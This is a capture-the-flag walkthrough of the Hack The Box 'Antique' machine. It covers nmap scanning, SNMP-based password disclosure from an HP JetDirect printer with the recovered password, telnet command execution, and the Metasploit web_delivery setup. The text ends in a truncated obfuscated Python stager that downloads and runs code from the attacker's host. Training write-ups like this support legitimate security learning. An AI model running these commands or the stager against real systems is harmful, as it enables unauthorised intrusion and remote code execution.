Summary
Antique is a Linux machine rated as an easy box by Hack The Box. On this box, we begin with a basic port scan and proceed based on the findings. Then we enumerate the telnet service and hunt for vulnerabilities present in a particular version. Next, we exploit a password disclosure vulnerability and obtain plaintext passwords. Then we are tasked with gaining root access, where we need to perform port forwarding and then read sensitive files by exploiting the file read vulnerability present in CUPS version 1.6.1. In addition, we escalate privileges and perform port forwarding using two different techniques.
Table of contents
Initial Access
- Initial Nmap TCP Port Scan
- Telnet Banner Grabbing
- Searching for the exploit
- SNMP Enumeration
- User Shell
- User Flag
Privilege Escalation
- Port Forwarding with Metasploit
- Finding Privilege Escalation Vectors
- Exploit File read Vulnerability
- Root Flag
- Manual Method
- Port forwarding with chisel
- Root flag
Let’s exploit it step by step.
Initial Access
We are going to start the assessment with a normal TCP port scan.
Initial Nmap TCP Port Scan
We begin with the port scan, where we use nmap to find out which ports are open and what services are running on the target host. Nmap is a popular port scanning tool that comes with Kali Linux. To perform the port scan, we used the -sV flag together with a full TCP port range against the target system, which scans all TCP ports and identifies the service version on each.
Flags used:
-sV: Attempts to determine the service version
-p-: Scans all 65535 TCP ports
nmap -p- -sV 10.129.33.36
From the nmap scan, we found that telnet is open. Telnet is used to make remote connections. Many telnet versions are vulnerable, and it is not a secure protocol because it does not use any encryption while communicating and transferring messages from one endpoint to another.
Telnet Banner Grabbing
While banner grabbing, the service showed an HP JetDirect banner and prompted for a password. By its name, it looks like a printer service managed over the telnet protocol. Administrators often use a common password for printers, but that did not work in our case.
Searching for the exploit
When we searched for exploits related to HP JetDirect, we found one available exploit for a vulnerability that discloses the device password. We downloaded the exploit and checked the source code, and found that it works over the SNMP protocol. If we get the device password, we can enumerate the device via telnet using those credentials. But this is only possible if the SNMP port is open.
searchsploit HP JetDirect
searchsploit -m 22319
cat 22319.txt
SNMP Enumeration
This time, we scan only the SNMP service, which works on its default port 161 over UDP. From the nmap scan result, we found that the SNMP port is open and the community name is public, which is very common. We also found that it is using SNMP version 1, which is an insecure version as it does not provide encryption.
Flags used:
-sU: Scans UDP ports
-sV: Attempts to determine the service version
-p: Scans only the given port
nmap -sU -sV -p 161 10.129.33.36
Next, we follow the exploit we found earlier, which gave us some decimal values. Here we have given the target IP address, which is 10.129.33.36.
snmpget -v 1 -c public 10.129.33.36 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Then, we copied all the decimal values and decoded them using CyberChef. CyberChef is an online tool used to encode and decode data. After decoding we got a plaintext password:
P@ssw0rd@123!!123
Reference link: https://gchq.github.io/CyberChef/
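The CyberChef step above is just a byte-to-text conversion, so it can be done offline. The following is an added example, not code from the original walkthrough: it parses the value part of an snmpget response line and decodes the space-separated byte values into text. The two sample response lines are constructed from the password the write-up reports, one in the decimal form the write-up describes and one in the hexadecimal form that snmpget prints for Hex-STRING and BITS values, so the same decoder covers both; the OID is the one queried on the page.

```python
"""Decode the byte values returned by snmpget into readable text.

Added example, not part of the original walkthrough. The sample response
lines are constructed from the password reported in the write-up.
"""
import re
import string

OID = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0"  # OID queried in the write-up

# Constructed sample: decimal byte values, as the write-up describes them.
SAMPLE_DECIMAL = (
    "iso" + OID[1:] + " = "
    "80 64 115 115 119 48 114 100 64 49 50 51 33 33 49 50 51"
)

# Constructed sample: the same value in the hex form snmpget uses for
# Hex-STRING / BITS results (assumed layout: a type label, then hex bytes).
SAMPLE_HEX = (
    "iso" + OID[1:] + " = Hex-STRING: "
    "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33"
)

# Characters we accept as part of a human-readable secret.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def extract_values(response_line: str) -> list[str]:
    """Return the numeric tokens after the '=' in an snmpget response line.

    An optional type label such as 'Hex-STRING:' or 'BITS:' is skipped.
    """
    _, _, value_part = response_line.partition("=")
    value_part = re.sub(r"^\s*[\w-]+:\s*", "", value_part)
    return value_part.split()


def decode_bytes(tokens: list[str], base: int = 10) -> str:
    """Convert numeric byte tokens (base 10 or 16) into text."""
    out = bytearray()
    for tok in tokens:
        n = int(tok, base)
        if not 0 <= n <= 255:
            raise ValueError(f"{tok!r} is not a byte value")
        out.append(n)
    # latin-1 maps every byte to a code point, so nothing is lost here
    return out.decode("latin-1")


def printable_prefix(text: str) -> str:
    """Keep the leading run of printable characters.

    BITS-style output can append extra numbers after the string bytes; those
    decode to control characters and would otherwise pollute the result.
    """
    result = []
    for ch in text:
        if ch not in PRINTABLE:
            break
        result.append(ch)
    return "".join(result)


def decode_response(response_line: str, base: int = 10) -> str:
    """Full pipeline: response line -> byte tokens -> printable text."""
    return printable_prefix(decode_bytes(extract_values(response_line), base))


if __name__ == "__main__":
    print(decode_response(SAMPLE_DECIMAL))
    print(decode_response(SAMPLE_HEX, base=16))
```

Pass `base=16` when the device answers with hex byte values and leave the default for decimal output; the printable-prefix filter discards any trailing non-text bytes in either case.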
User Shell
With the obtained credentials, we logged in to telnet and used the help command (?). There we saw that we can use the exec command, which means we can execute any system command from here.
Then we used the Metasploit script web delivery module, which starts a server and serves the payload so that we receive a reverse shell. Once the server has started, we use the Python reverse shell it generates; executing it gives us a Meterpreter session. To do that, we have to provide the srvhost IP address, the local host IP address and the listening port, but we can skip lport as Metasploit picks it by itself, and its default listening port is 4444. Please note that both srvhost and the local host IP address are the same as our Kali machine's IP address. More information about this module is available here:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery/
use multi/script/web_delivery
set lhost 10.10.14.93
set srvhost 10.10.14.93
exploit
python3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0
Source: HackingArticles
Source Link: https://www.hackingarticles.in/antique-hackthebox-walkthrough/